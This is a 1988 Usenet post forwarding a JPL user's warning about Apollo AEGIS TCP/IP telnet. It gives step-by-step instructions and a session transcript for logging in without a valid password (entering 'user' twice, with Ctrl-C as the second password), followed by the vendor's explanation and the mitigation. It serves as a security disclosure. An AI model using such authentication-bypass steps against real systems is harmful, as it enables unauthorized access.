Path: utzoo!attcan!uunet!lll-winken!lll-tis!helios.ee.lbl.gov!pasteur!ucbvax!DELRIO.CC.UMICH.EDU!paul From: paul@DELRIO.CC.UMICH.EDU ('da Kingfish) Newsgroups: comp.sys.apollo Subject: Forwarded message -- Security on APOLLO TCP/IP network Message-ID: <8806080536.AA19951@delrio.cc.umich.edu> Date: 8 Jun 88 05:36:52 GMT Sender: daemon@ucbvax.BERKELEY.EDU Organization: The Internet Lines: 96 ------- Forwarded Message Date: Thu, 02 Jun 88 14:19:57 -0700 From: NKARIMI@gpvax.JPL.NASA.GOV To: apollo%yale.arpa@jpl-mil.ARPA Subject: Security on APOLLO TCP/IP network Hello, I have a question about TCP/IP network security on the APOLLO workstations. Does APOLLO sell any off-the-shelf software/hardware products that has some kind of encryption technique for when you are doing TELNET or FTP ? Except the Userid/Password protection, is there any other way I can make sure unauthorized people can not access our workstations ? Also recently I came across something that looked like a major security issue to me on the APOLLO workstation. Try this experiment: 1) TELNET to an APOLLO workstation that is running the AEGIS TCP/IP network software. 2) for the USERID, type in : USER 3) for the password, type in some junk characters The telnet_server on the other machine comes back with the message: Invalid attempt to log in l name [project [org]] [-p] [-h] -p will allow you to change your password -h will allow you to change your home directory % may be used as wildcard for project or org Please log in: ( so far everything is fine. ) 4) at the "Please log in: " prompt type in: USER again 5) for the password; type in ^C (control-C) you will get logged in as user.none.none !! If you don't believe me, the exact session follows: - --------------------------------------------------- $ telnet xxx.xxx.x.xxx Trying... Open Apollo Telnet Daemon Erase is ^H and Kill is ^U Please log in: user Password: Invalid attempt to log in l name [project [org]] [-p] [-h] -p will allow you to change your password -h will allow you to change your home directory % may be used as wildcard for project or org Please log in: user Password: Using local registry. Can't use network registry: - process interrupt (from OS / fault handler) Logged in as user.none.none on 1988/06/02 Thu 12:29 (PST). $ - ---------------------------------------------------- NOW, THAT TO ME IS A MAJOR SECURITY BREAK. So, I called in some of the APOLLO people that I knew, and the response I got back was this: "Well, it is basically a feature that APOLLO has included so that if by any chance you mess-up your registries and there is no way that you can get in to your system, then you can get logged in as user.none and try to recover your registries". I was told the solution to this problem is to delete the user.none.none entry from our registries and then the problem should be fixed. So a warning to all APOLLO users that are running the AEGIS TCP/IP network software: delete your user.none.none or anybody can login to your system. Now, why hasn't this FEATURE been documented anywhere ? Note: the above problem does not exist on the workstations that are running DOMAIN/IX. Thanks for listening Nader Karimi ------- End of Forwarded Message